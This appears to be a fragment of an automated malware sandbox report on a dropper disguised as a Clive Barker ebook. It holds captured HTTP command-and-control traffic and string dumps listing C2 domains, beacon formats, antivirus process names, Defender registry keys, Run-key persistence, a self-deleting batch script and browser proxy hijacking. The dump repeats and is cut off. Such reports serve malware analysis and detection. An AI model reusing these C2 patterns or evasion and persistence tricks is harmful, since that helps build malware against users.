<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://bg.battletech.com/lhous3.gif?pr=gwY92w4AcL4x7xCkvoknrnKGYDJULQxy1JhNaygpF7pd5oFfqvgCtiV9uNLuhiEf7TzHhAOUhSlngnyhTvxdyVy9qjsqTfUWh6uEesjLYYVXW1vwRvA/hLJO2LUPIRIgRG7N59HWSUgzFbkWM50wiLD24Nslq+JEx/Bpa9h+3PvFUi7asT24dcH/azc1gv+KrtpgpyaKvRpUrPZEaGug6H+wDDLFSsQ7mXa6OlZDii3pytod8aDviUQSaHigo9ndJG9AxeHv4KBLRDQs7Weu7LksJFILKpq7+C657kM">here</a>.</p>.<hr>.<address>Apache Server at classicbattletech.com Port 80</address>.</body></html>...
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 12 Mar 2014 20:20:10 GMT
Accept-Ranges: bytes
ETag: "0b96c77303ecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 54007
Cache-Control: max-age=6822
Date: Sat, 29 Mar 2014 01:55:29 GMT
Connection: close
X-CCC: SE
X-CID: 2
MSCF............,...................I.................lDxa .authroot.stl......8..CK...<T...g.v!M.d..f.%d..}K..5..F..d'K......%K..%...!..=.k..........{=/....{g.~..........<.....h..b...8..Ep.x.....G. .....pq..``a.i|"n|8...!..gv...: I........!...%$....;PBHA.....!A....L...'...:..0...I....fD"N#...._..?....E..m..1\.$...{P....:......../...\YB.m:.....dE.....)...V....$....Dn:....0E..S."...o..q.....K...I..K...(x%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,....`0$z.@....x"....T..H...<.CQ..H.M.K.".H....`.....!.G....AF\.{...V..LCy.i y..Q.'..M...bE.%..<...nG.3..\K.t..ah...5Z~.h...8..@.).... ....X...v..,.-.M..u.......Z"..U...0:O%..}.(t............=R.......[b...z.....8..)........M|..g..L.a...>....[.E&..{..|..t...[t..B......./[..&.L`.w....[L..ZW.... ."....<...I.G\.H[:...B.B.qT... ..(....: U....(.J.....?._..'..Hp..o.B......!......bj.G.u^.%\r..b...*7.[nO..S...b.l@jn. .Hb...M.....9.....8.='...)\.....M.#.M......L.Jh.../..G.!\.Y....&.....P^...,..U..3...W...._...0..?*...KZ....fM...8.6U..aG.a.......~....?.N. .3.....,>.rH..*O..E..T0.......?i...k.T.'>".....E....%SK.v..8...t.:...].E.K2....u..../i.t.9....2N..QI ..h..t..Ad....0.........*...R......|......7A:bP. n:.......Fk.[q....]D.......3.0.)...G]..?4.o...p......?...3....@..jn#.n\.-....p.T..G............4.......:H....2..9.|.`~0GL.=....u.y...L0iL.....A....^.=_.....5.=.=n.@....Hu..r#.T...{.......P.....[..j.....i.%...d...h.........c......9m...@.....W.p.E.5.@......]%..g.1..3Z6^<!.Q...m......9....l..x.....$7..[.....L........L....F*....D.U.'...
<<
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Connection: close
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Sat, 29 Mar 2014 01:55:29 GMT
Connection: close
X-CCC: SE
X-CID: 2
1401CF3DB40B609892..
GET /logo.png?tq=gHZutHoLpb2HdjbiNAjrpsSCJbO+V98lHA==&pr=41 HTTP/1.0
Connection: close
Host: worldorderlive.com
Accept: */*
User-Agent: chrome/9.0
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1420
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=81
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.worldorderlive.com; path=/; expires=Sun, 30-Mar-2014 01:55:28 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>worldorderlive.com</title>. <meta name="keywords" content="worldorderlive.com" />. <meta name="description" content="worldorderlive.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX03sPCYVTJHfx37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTFReDJHHEUhQi75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPDZA8NA0amXpQT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A" name="worldorderlive.com">. </frameset>. <noframes>..<body><a href="hXXp://worldorderlive.com?epl=RVMWgRUNFl9uv0mXknhcMBAX03sPCYVTJHfx37ALuc5zKR4B0YzLPUzkDwlng5k0JCJAKyBzgIht74zgzNBNaJ8VPEHChTFReDJHHEUhQi75jIVtRUWKIwyukB2sdbchwtlqkZm3Yapi2Y7mT92nlGYaGiTTaHqaakJPDZA8NA0amXpQT3pUQ5UAIJDfr78AAGB_AQAAQIDbCgAAcTG991lTJllBMTZoWkKdAAAA8A">Click here to go to worldorderlive.com</a>.</body>
<<
<<< skipped >>>
Map
Strings from Dumps
Clive Barker - Books Of Blood 03.exe_172:
.text
.text
`.rdata
`.rdata
@.data
@.data
@.rsrc
@.rsrc
WSSSSh
WSSSSh
^SShq
^SShq
SSSh4&A
SSSh4&A
SSh<'A</pre><pre>%.*s(%d)%s</pre><pre>rtmp%d</pre><pre><head><meta http-equiv="content-type" content="text/html; charset=</pre><pre>shlwapi.dll</pre><pre>%s %s</pre><pre>%s %s %s</pre><pre>GETPASSWORD1</pre><pre>%s%s%d</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>%s.%d.tmp</pre><pre>winrarsfxmappingfile.tmp</pre><pre>-el -s2 "-d%s" "-p%s" "-sp%s"</pre><pre>__tmp_rar_sfx_access_check_%u</pre><pre>sfxcmd</pre><pre>COMCTL32.DLL</pre><pre>riched20.dll</pre><pre>riched32.dll</pre><pre>COMCTL32.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>COMDLG32.dll</pre><pre>RegCloseKey</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>SHFileOperationA</pre><pre>ShellExecuteExA</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>WINRAR.SFX</pre><pre>d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb</pre><pre>C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe</pre><pre>:(,4;<=>;?@</pre><pre>3,45657879</pre><pre>8888888888887</pre><pre>version="1.0.0.0"</pre><pre><requestedExecutionLevel level="asInvoker"</pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre><!--The ID below indicates application support for Windows Vista --></pre><pre><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></pre><pre><!--The ID below indicates application support for Windows 7 --></pre><pre><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></pre><pre><asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"></pre><pre></asmv3:windowsSettings></pre><pre>Shell.Explorer</pre><pre>Enter password</pre><pre>&Enter password for the encrypted file:</pre><pre>Extracting %s</pre><pre>Skipping %s</pre><pre>The file "%s" header is corrupt%The archive comment header is corrupt</pre><pre>Unknown method in %s</pre><pre>Cannot open %s</pre><pre>Cannot create %s</pre><pre>Cannot create folder %s</pre><pre>6CRC failed in the encrypted file %s (wrong password ?)</pre><pre>CRC failed in %s</pre><pre>Packed data CRC failed in %s</pre><pre>Wrong password for %s5Write error in the file %s. Probably the disk is full</pre><pre>Read error in the file %s</pre><pre>Extracting from %s</pre><pre>ErroraErrors encountered while performing the operation</pre><pre>Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.</pre><b>3R2R.exe_1728:</b><pre>`.rsrc</pre><pre>PSSh$</pre><pre>SSShbU@</pre><pre>SSj%S</pre><pre><%u,V</pre><pre><3%u1f</pre><pre>GetProcessWindowStation</pre><pre>operator</pre><pre>deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler</pre><pre>1.2.5</pre><pre>inflate 1.2.5 Copyright 1995-2010 Mark Adler</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</pre><pre>\sc.exe</pre><pre>ntdll.dll</pre><pre>iexplore.exe</pre><pre>opera.exe</pre><pre>firefox.exe</pre><pre>safari.exe</pre><pre>chrome.exe</pre><pre>AVGIDSMonitor.exe</pre><pre>AVGIDSAgent.exe</pre><pre>avgchsvx.exe</pre><pre>avgemcx.exe</pre><pre>avgnsx.exe</pre><pre>avgrsx.exe</pre><pre>avgtray.exe</pre><pre>avgwdsvc.exe</pre><pre>avgnt.exe</pre><pre>ccsvchst.exe</pre><pre>AvastUI.exe</pre><pre>mcagent.exe</pre><pre>SOFTWARE\Microsoft\Windows Defender\Real-Time Protection</pre><pre>SOFTWARE\Microsoft\Windows Defender</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>explorer.exe</pre><pre>Windows Security Center</pre><pre>%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center</pre><pre>rundll32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Defender</pre><pre>at %d:%d "%s" %s</pre><pre>win32iexplore.exe</pre><pre>win32opera.exe</pre><pre>win32firefox.exe</pre><pre>win32safari.exe</pre><pre>win32winword.exe</pre><pre>win32excel.exe</pre><pre>win32outlook.exe</pre><pre>win32photoshop.exe</pre><pre>win32wmplayer.exe</pre><pre>win32java.exe</pre><pre>win32itunes.exe</pre><pre>win32msmsgs.exe</pre><pre>java.exe</pre><pre>*.log</pre><pre>%s:\windows\system32\%s.tmp</pre><pre>%s:\windows\syswow64\%s.tmp</pre><pre>%s:\WINNT\system32\%s.tmp</pre><pre>%s:\WINNT\syswow64\%s.tmp</pre><pre>Find Temporary files is %d</pre><pre>cannot open files %s, Open next files ?</pre><pre>{A1D429DE-B782-4253-84AD-6E09A8438AD5}</pre><pre>\Windows NT</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>%s\%s</pre><pre>%s.%s</pre><pre>stor.cfg</pre><pre>exec%s</pre><pre>{35BCA615-C82A-4152-8857-BCC626AE4C8D}</pre><pre>{4D92BB9F-9A66-458f-ACA4-66172A7016D4}</pre><pre>lvvm.exe</pre><pre>{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}</pre><pre>{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}</pre><pre>{6B985724-623F-492e-B0D6-C9715ADE853B}</pre><pre>{B37C48AF-B05C-4520-8B38-2FE181D5DC78}</pre><pre>{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}</pre><pre>Advapi32.dll</pre><pre>%s%s_1</pre><pre>%s_0_%d_%s</pre><pre>%s_%d</pre><pre>%s_%d_%d_%d_%d</pre><pre>%s_%s</pre><pre>http://</pre><pre>POST %s HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: mozilla/2.0</pre><pre>Content-Length: %u</pre><pre>POST http://%s%s HTTP/1.1</pre><pre>HTTP/1.0 200 OK</pre><pre>HTTP/1.1 200 OK</pre><pre>%s?tq=%s</pre><pre>id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111</pre><pre>%s_%s_%d</pre><pre>_1_%d</pre><pre>_2_%d</pre><pre>_3_%d</pre><pre>_4_%d</pre><pre>http://worldorderlive.com</pre><pre>http://rumperstumprs.com</pre><pre>http://transaerosystems.com</pre><pre>http://freeridershools.com</pre><pre>http://ourbigdrophills.com</pre><pre>http://mydbonlineaccess.com</pre><pre>http://onlinepdahelpforyou.com</pre><pre>http://remarkreddomas.com</pre><pre>http://transfersakkonline.com</pre><pre>http://backupdomaintolevel.com</pre><pre>SELECT_RESERV_SRV_%d</pre><pre>%s_%d_%s</pre><pre>id=%s&c=%d</pre><pre>%s_%d_%d_%d</pre><pre>%s_%d_%d</pre><pre>%s %s</pre><pre>%s start%s%c%s</pre><pre>c1.exe</pre><pre>c2.exe</pre><pre>c3.exe</pre><pre>DWN_CON_STRP_%d_%s</pre><pre>http://%d.ctrl.%s</pre><pre>logo.png</pre><pre>img/135.png</pre><pre>img/136.png</pre><pre>t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d</pre><pre>t=%s&q=&s=%d&hrs=%d</pre><pre>%s/%s?tq=%s&pr=%d</pre><pre>%s:%d/%s?tq=%s&pr=%d</pre><pre>http://armoredlegion.com/305986.png</pre><pre>http://armoredlegion.com/16354.png</pre><pre>http://armoredlegion.com/716354_m61.png</pre><pre>http://mektek.net/thelab/wiley.jpg</pre><pre>http://knowledgesutra.com/img/temp/hi.cgi</pre><pre>http://knowledgesutra.com/img/temp/head.png</pre><pre>http://battleon.com/134.gif</pre><pre>http://battleon.com/132.gif</pre><pre>http://battleon.com/133.gif</pre><pre>http://browsermmorpg.com/images/cpc.png</pre><pre>http://browsermmorpg.com/images/cpc2.png</pre><pre>http://browsermmorpg.com/img/intel.gif</pre><pre>http://browsermmorpg.com/img/intel.jpg</pre><pre>http://012webpages.com/christian12.jpg</pre><pre>http://012webpages.com/christian13.jpg</pre><pre>http://012webpages.com/christian14.jpg</pre><pre>http://tri-countymech.com/g/livechat.png</pre><pre>http://tri-countymech.com/g/logo.png</pre><pre>http://tri-countymech.com/g/133.jpg</pre><pre>http://tri-countymech.com/g/134.jpg</pre><pre>http://electronicstheory.com/pics/valley.png</pre><pre>http://electronicstheory.com/pics/sun.png</pre><pre>http://classicbattletech.com/lhous3.gif</pre><pre>http://classicbattletech.com/lhous4.gif</pre><pre>http://classicbattletech.com/lhous5.gif</pre><pre>http://classicbattletech.com/lhous6.gif</pre><pre>http://engineeringcrossing.com/images/misc/23525.png</pre><pre>http://engineeringcrossing.com/images/misc/64646.png</pre><pre>t=t&hrs=%d&q=id=1000&ver=%s&s=%d</pre><pre>t=ip&hrs=%d&q=&s=1</pre><pre>%s?pr=%s</pre><pre>\bl%d_64.bat</pre><pre>del "%s"</pre><pre>if exist "%s" goto a</pre><pre>cmd.exe /c "%s"</pre><pre>%s.zl</pre><pre>{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d</pre><pre>{C66E79CE-8935-4ed9-A6B1-4983619CB925}</pre><pre>{61B98B86-5F44-42b3-BCA1-33904B067B81}</pre><pre>{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}</pre><pre>{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}</pre><pre>GET %s HTTP/1.0</pre><pre>http://xprstats.com/images/logo.png</pre><pre>drweb</pre><pre>id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d</pre><pre>t=ml&q=%s</pre><pre>xprstats.com</pre><pre>http://%s%s</pre><pre>ldr.ini</pre><pre>reportfrommains.com</pre><pre>http://%s/s.php?c=121&id=%s</pre><pre>onlinereportsystem.com</pre><pre>%s_1_%d_%s</pre><pre>%s_2_%d_%s</pre><pre>%s_3_%d_%s</pre><pre>%s_4_%d_%s</pre><pre>pmv=2&id=%s&hwid=%s</pre><pre>u.exe</pre><pre>%s up%s</pre><pre>&%s=%s</pre><pre>PRM_LSTN_THIS_PORT</pre><pre>127.0.0.1</pre><pre>HTTP/1.x</pre><pre>google.com</pre><pre>http://www.google.com</pre><pre>HTTP/1.1 302 Found</pre><pre>Location: %s</pre><pre>id=%s&type=%d&ppcid=%s</pre><pre>%s: %s</pre><pre>%s_5_%s</pre><pre>http=127.0.0.1:</pre><pre>prefs.js</pre><pre>Mozilla</pre><pre>"network.proxy.http"</pre><pre>"network.proxy.http_port"</pre><pre>"network.proxy.type"</pre><pre>"127.0.0.1"</pre><pre>%s(%s, %s);</pre><pre>operaprefs.ini</pre><pre>Opera</pre><pre>Use HTTP</pre><pre>HTTP server</pre><pre>127.0.0.1:%s</pre><pre>%s=%s</pre><pre>%s:%s</pre><pre>hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s</pre><pre>id=%s&hwid=%s</pre><pre>exec|%s</pre><pre>http=</pre><pre><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></pre><pre>bing.com</pre><pre>yahoo.com</pre><pre>search.aol.</pre><pre>suche.aol.</pre><pre>searcht2.aol.</pre><pre>.yimg.com</pre><pre>.bing.net</pre><pre>scorecardresearch.com</pre><pre>brightcove.com</pre><pre>.aol.</pre><pre>.atwola.</pre><pre>.ivwbox.</pre><pre>.google</pre><pre>.atdmt.</pre><pre>.abmr.</pre><pre>.tacoda.</pre><pre>.adtechus.</pre><pre>.autodatadirect.</pre><pre>.mapquestapi.</pre><pre>.ggpht.</pre><pre>.virtualearth.</pre><pre>.opera.</pre><pre>.microsoft.</pre><pre>.wsod.</pre><pre>.doubleclick.</pre><pre>.ypcdn.</pre><pre>.truveo.</pre><pre>.tlowdb.</pre><pre>mapq.st</pre><pre>.dartsearch.</pre><pre>.thawte.</pre><pre>http://</pre><pre>bing.com/search</pre><pre>search.yahoo.com/search</pre><pre>%s_1_%s</pre><pre>err%d%s_%d_%d</pre><pre>err0%s_%d_%d</pre><pre>ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d</pre><pre>%s:443/%s</pre><pre>%s_2_%s</pre><pre>%s_%s_%s</pre><pre>%s_3_%s</pre><pre>www.www.ru</pre><pre>https://</pre><pre>.doubleclick.net</pre><pre>doubleclick.net</pre><pre>msn.com</pre><pre>%s_0%d_%d</pre><pre>=='undefined'?'%s':'%s'
SSh<'A</pre><pre>%.*s(%d)%s</pre><pre>rtmp%d</pre><pre><head><meta http-equiv="content-type" content="text/html; charset=</pre><pre>shlwapi.dll</pre><pre>%s %s</pre><pre>%s %s %s</pre><pre>GETPASSWORD1</pre><pre>%s%s%d</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>%s.%d.tmp</pre><pre>winrarsfxmappingfile.tmp</pre><pre>-el -s2 "-d%s" "-p%s" "-sp%s"</pre><pre>__tmp_rar_sfx_access_check_%u</pre><pre>sfxcmd</pre><pre>COMCTL32.DLL</pre><pre>riched20.dll</pre><pre>riched32.dll</pre><pre>COMCTL32.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>COMDLG32.dll</pre><pre>RegCloseKey</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>SHFileOperationA</pre><pre>ShellExecuteExA</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>WINRAR.SFX</pre><pre>d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb</pre><pre>C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\Clive Barker - Books Of Blood 03.exe</pre><pre>:(,4;<=>;?@</pre><pre>3,45657879</pre><pre>8888888888887</pre><pre>version="1.0.0.0"</pre><pre><requestedExecutionLevel level="asInvoker"</pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre><!--The ID below indicates application support for Windows Vista --></pre><pre><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></pre><pre><!--The ID below indicates application support for Windows 7 --></pre><pre><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></pre><pre><asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"></pre><pre></asmv3:windowsSettings></pre><pre>Shell.Explorer</pre><pre>Enter password</pre><pre>&Enter password for the encrypted file:</pre><pre>Extracting %s</pre><pre>Skipping %s</pre><pre>The file "%s" header is corrupt%The archive comment header is corrupt</pre><pre>Unknown method in %s</pre><pre>Cannot open %s</pre><pre>Cannot create %s</pre><pre>Cannot create folder %s</pre><pre>6CRC failed in the encrypted file %s (wrong password ?)</pre><pre>CRC failed in %s</pre><pre>Packed data CRC failed in %s</pre><pre>Wrong password for %s5Write error in the file %s. Probably the disk is full</pre><pre>Read error in the file %s</pre><pre>Extracting from %s</pre><pre>ErroraErrors encountered while performing the operation</pre><pre>Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.</pre><b>3R2R.exe_1728:</b><pre>`.rsrc</pre><pre>PSSh$</pre><pre>SSShbU@</pre><pre>SSj%S</pre><pre><%u,V</pre><pre><3%u1f</pre><pre>GetProcessWindowStation</pre><pre>operator</pre><pre>deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler</pre><pre>1.2.5</pre><pre>inflate 1.2.5 Copyright 1995-2010 Mark Adler</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</pre><pre>\sc.exe</pre><pre>ntdll.dll</pre><pre>iexplore.exe</pre><pre>opera.exe</pre><pre>firefox.exe</pre><pre>safari.exe</pre><pre>chrome.exe</pre><pre>AVGIDSMonitor.exe</pre><pre>AVGIDSAgent.exe</pre><pre>avgchsvx.exe</pre><pre>avgemcx.exe</pre><pre>avgnsx.exe</pre><pre>avgrsx.exe</pre><pre>avgtray.exe</pre><pre>avgwdsvc.exe</pre><pre>avgnt.exe</pre><pre>ccsvchst.exe</pre><pre>AvastUI.exe</pre><pre>mcagent.exe</pre><pre>SOFTWARE\Microsoft\Windows Defender\Real-Time Protection</pre><pre>SOFTWARE\Microsoft\Windows Defender</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>explorer.exe</pre><pre>Windows Security Center</pre><pre>%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center</pre><pre>rundll32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Defender</pre><pre>at %d:%d "%s" %s</pre><pre>win32iexplore.exe</pre><pre>win32opera.exe</pre><pre>win32firefox.exe</pre><pre>win32safari.exe</pre><pre>win32winword.exe</pre><pre>win32excel.exe</pre><pre>win32outlook.exe</pre><pre>win32photoshop.exe</pre><pre>win32wmplayer.exe</pre><pre>win32java.exe</pre><pre>win32itunes.exe</pre><pre>win32msmsgs.exe</pre><pre>java.exe</pre><pre>*.log</pre><pre>%s:\windows\system32\%s.tmp</pre><pre>%s:\windows\syswow64\%s.tmp</pre><pre>%s:\WINNT\system32\%s.tmp</pre><pre>%s:\WINNT\syswow64\%s.tmp</pre><pre>Find Temporary files is %d</pre><pre>cannot open files %s, Open next files ?</pre><pre>{A1D429DE-B782-4253-84AD-6E09A8438AD5}</pre><pre>\Windows NT</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>%s\%s</pre><pre>%s.%s</pre><pre>stor.cfg</pre><pre>exec%s</pre><pre>{35BCA615-C82A-4152-8857-BCC626AE4C8D}</pre><pre>{4D92BB9F-9A66-458f-ACA4-66172A7016D4}</pre><pre>lvvm.exe</pre><pre>{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}</pre><pre>{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}</pre><pre>{6B985724-623F-492e-B0D6-C9715ADE853B}</pre><pre>{B37C48AF-B05C-4520-8B38-2FE181D5DC78}</pre><pre>{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}</pre><pre>Advapi32.dll</pre><pre>%s%s_1</pre><pre>%s_0_%d_%s</pre><pre>%s_%d</pre><pre>%s_%d_%d_%d_%d</pre><pre>%s_%s</pre><pre>http://</pre><pre>POST %s HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: mozilla/2.0</pre><pre>Content-Length: %u</pre><pre>POST http://%s%s HTTP/1.1</pre><pre>HTTP/1.0 200 OK</pre><pre>HTTP/1.1 200 OK</pre><pre>%s?tq=%s</pre><pre>id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111</pre><pre>%s_%s_%d</pre><pre>_1_%d</pre><pre>_2_%d</pre><pre>_3_%d</pre><pre>_4_%d</pre><pre>http://worldorderlive.com</pre><pre>http://rumperstumprs.com</pre><pre>http://transaerosystems.com</pre><pre>http://freeridershools.com</pre><pre>http://ourbigdrophills.com</pre><pre>http://mydbonlineaccess.com</pre><pre>http://onlinepdahelpforyou.com</pre><pre>http://remarkreddomas.com</pre><pre>http://transfersakkonline.com</pre><pre>http://backupdomaintolevel.com</pre><pre>SELECT_RESERV_SRV_%d</pre><pre>%s_%d_%s</pre><pre>id=%s&c=%d</pre><pre>%s_%d_%d_%d</pre><pre>%s_%d_%d</pre><pre>%s %s</pre><pre>%s start%s%c%s</pre><pre>c1.exe</pre><pre>c2.exe</pre><pre>c3.exe</pre><pre>DWN_CON_STRP_%d_%s</pre><pre>http://%d.ctrl.%s</pre><pre>logo.png</pre><pre>img/135.png</pre><pre>img/136.png</pre><pre>t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d</pre><pre>t=%s&q=&s=%d&hrs=%d</pre><pre>%s/%s?tq=%s&pr=%d</pre><pre>%s:%d/%s?tq=%s&pr=%d</pre><pre>http://armoredlegion.com/305986.png</pre><pre>http://armoredlegion.com/16354.png</pre><pre>http://armoredlegion.com/716354_m61.png</pre><pre>http://mektek.net/thelab/wiley.jpg</pre><pre>http://knowledgesutra.com/img/temp/hi.cgi</pre><pre>http://knowledgesutra.com/img/temp/head.png</pre><pre>http://battleon.com/134.gif</pre><pre>http://battleon.com/132.gif</pre><pre>http://battleon.com/133.gif</pre><pre>http://browsermmorpg.com/images/cpc.png</pre><pre>http://browsermmorpg.com/images/cpc2.png</pre><pre>http://browsermmorpg.com/img/intel.gif</pre><pre>http://browsermmorpg.com/img/intel.jpg</pre><pre>http://012webpages.com/christian12.jpg</pre><pre>http://012webpages.com/christian13.jpg</pre><pre>http://012webpages.com/christian14.jpg</pre><pre>http://tri-countymech.com/g/livechat.png</pre><pre>http://tri-countymech.com/g/logo.png</pre><pre>http://tri-countymech.com/g/133.jpg</pre><pre>http://tri-countymech.com/g/134.jpg</pre><pre>http://electronicstheory.com/pics/valley.png</pre><pre>http://electronicstheory.com/pics/sun.png</pre><pre>http://classicbattletech.com/lhous3.gif</pre><pre>http://classicbattletech.com/lhous4.gif</pre><pre>http://classicbattletech.com/lhous5.gif</pre><pre>http://classicbattletech.com/lhous6.gif</pre><pre>http://engineeringcrossing.com/images/misc/23525.png</pre><pre>http://engineeringcrossing.com/images/misc/64646.png</pre><pre>t=t&hrs=%d&q=id=1000&ver=%s&s=%d</pre><pre>t=ip&hrs=%d&q=&s=1</pre><pre>%s?pr=%s</pre><pre>\bl%d_64.bat</pre><pre>del "%s"</pre><pre>if exist "%s" goto a</pre><pre>cmd.exe /c "%s"</pre><pre>%s.zl</pre><pre>{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d</pre><pre>{C66E79CE-8935-4ed9-A6B1-4983619CB925}</pre><pre>{61B98B86-5F44-42b3-BCA1-33904B067B81}</pre><pre>{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}</pre><pre>{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}</pre><pre>GET %s HTTP/1.0</pre><pre>http://xprstats.com/images/logo.png</pre><pre>drweb</pre><pre>id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d</pre><pre>t=ml&q=%s</pre><pre>xprstats.com</pre><pre>http://%s%s</pre><pre>ldr.ini</pre><pre>reportfrommains.com</pre><pre>http://%s/s.php?c=121&id=%s</pre><pre>onlinereportsystem.com</pre><pre>%s_1_%d_%s</pre><pre>%s_2_%d_%s</pre><pre>%s_3_%d_%s</pre><pre>%s_4_%d_%s</pre><pre>pmv=2&id=%s&hwid=%s</pre><pre>u.exe</pre><pre>%s up%s</pre><pre>&%s=%s</pre><pre>PRM_LSTN_THIS_PORT</pre><pre>127.0.0.1</pre><pre>HTTP/1.x</pre><pre>google.com</pre><pre>http://www.google.com</pre><pre>HTTP/1.1 302 Found</pre><pre>Location: %s</pre><pre>id=%s&type=%d&ppcid=%s</pre><pre>%s: 